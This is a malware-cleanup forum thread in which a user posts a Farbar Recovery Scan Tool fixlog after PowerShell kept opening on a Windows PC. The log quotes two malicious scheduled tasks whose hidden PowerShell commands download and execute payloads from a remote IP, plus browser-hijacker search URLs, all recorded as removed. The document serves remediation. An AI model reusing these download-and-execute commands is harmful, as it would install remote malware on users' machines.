NenshoOkami

That was all, thanks for your help!

Yeah sorry, Its been a rough week at work, I barley had time to use on the pc. I'm sorry, my parents deleted mal ware bytes (they tend to be skeptical with anything that's not avast). Thanks for your help though,

Yeah, I haven't been home these days, when I get home I'll do it if my parents haven't Uninstalled mal ware bytes

Sure, where should i find it?

Done, thanks again! For now there was no instance of powershell opening itself. Thanks again!

Fix result of Farbar Recovery Scan Tool (x64) Version: 26-09-2017 01 Ran by Luna} (29-09-2017 12:33:19) Run:2 Running from C:\Users\Luna}\Desktop\frst Loaded Profiles: Luna} (Available Profiles: defaultuser0 & Luna}) Boot Mode: Normal ============================================== fixlist content: ***************** CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-2514381102-4124612222-254268757-1002\...\Run: [GoogleChromeAutoLaunch_6D20AE1FDA97B1FAC0FBC36117A0CF97] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [1451352 2017-09-21] (Google Inc.) CHR StartupUrls: Default -> "","hxxps://www.google.com.ar/","hxxp://www.searchult.com/?bd=hp&oem=testsinstcr&uid=TOSHIBAXDT01ACA050_34FGJHVBSXX34FGJHVBSX&version=2.3.0.8956&pid=414031160&tid=440","hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRggVdFsMA11BFBhFI1oPTA1EEg0OeFhbAxQQGANAIQtbVA9HEAwFIk0FA1oDB0VXfV5bFElXTwhuL0tdM1wCVFlXM3FNAw==" CHR DefaultSearchKeyword: Default -> qs C:\ProgramData\mntemp C:\Users\Luna}\AppData\LocalLow\勇者と魔法使いとおとぎの絵本 Task: {3E0D3E87-D3B8-43B9-B81D-AB47A4199623} - System32\Tasks\Windows Emergency Update => powershell -w hidden -nopr "$o=new-object -com inTeRnETexplOrer.aPplicATiON;$o.viSIblE=$false;$o.nAVIGaTE(\"5.79.81.161/eech8ahZ\");sleep 10;iex([Text.Encoding]::utF8.geTStrIng([Convert]::FROmbasE64stRiNG($o.dOCUmeNT.bodY.INnERTEXt)))" Task: {F359782D-2D19-4CE4-87EF-E07085649319} - System32\Tasks\SeraphX => powershell.exe -windowstyle hidden -noprofile $loc=$env:temp+'\stage.bin';$deloc= $env:temp+'\stage.ps1';if(![system.io.file]::exists($loc)){(new-object system.net.webclient).downloadfile('hxxp://5.79.81.161/stage.bin',$loc);}$file=[system.io.file]::readallbytes($loc);$revfile=@(0)*$file.length;for($i=0;$i -lt $fi (the data entry has 420 more characters). AlternateDataStreams: C:\Users\Luna}\AppData\Local\Temp:$DATA [16] EmptyTemp: ***************** Processes closed successfully. Restore point was successfully created. HKU\S-1-5-21-2514381102-4124612222-254268757-1002\Software\Microsoft\Windows\CurrentVersion\Run\\GoogleChromeAutoLaunch_6D20AE1FDA97B1FAC0FBC36117A0CF97 => value removed successfully Chrome StartupUrls => removed successfully Chrome DefaultSearchKeyword => removed successfully C:\ProgramData\mntemp => moved successfully C:\Users\Luna}\AppData\LocalLow\勇者と魔法使いとおとぎの絵本 => moved successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{3E0D3E87-D3B8-43B9-B81D-AB47A4199623} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3E0D3E87-D3B8-43B9-B81D-AB47A4199623} => key removed successfully C:\Windows\System32\Tasks\Windows Emergency Update => moved successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Windows Emergency Update => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{F359782D-2D19-4CE4-87EF-E07085649319} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F359782D-2D19-4CE4-87EF-E07085649319} => key removed successfully C:\Windows\System32\Tasks\SeraphX => moved successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SeraphX => key removed successfully C:\Users\Luna}\AppData\Local\Temp => ":$DATA" ADS removed successfully. =========== EmptyTemp: ========== BITS transfer queue => 32768 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 14868670 B Java, Flash, Steam htmlcache => 7219252 B Windows/system/drivers => 38212 B Edge => 0 B Chrome => 363806873 B Firefox => 0 B Opera => 0 B Temp, IE cache, history, cookies, recent: Default => 0 B Users => 0 B ProgramData => 0 B Public => 0 B systemprofile => 128 B systemprofile32 => 128 B LocalService => 7514 B NetworkService => 0 B defaultuser0 => 0 B Luna} => 60150269 B RecycleBin => 709645194 B EmptyTemp: => 1.1 GB temporary data Removed. ================================ The system needed a reboot. ==== End of Fixlog 12:34:54 ==== There you go, thanks for the help, ill let you know if the problem persists!

Just like the title says, after i disabled windos defender for some minutes to open some stuff up that was tagged as "cracker" or something like that it started happening. Malwarebytes scanner showed 0 identified threats. What should i do? Thanks!. Addition.txt FRST.txt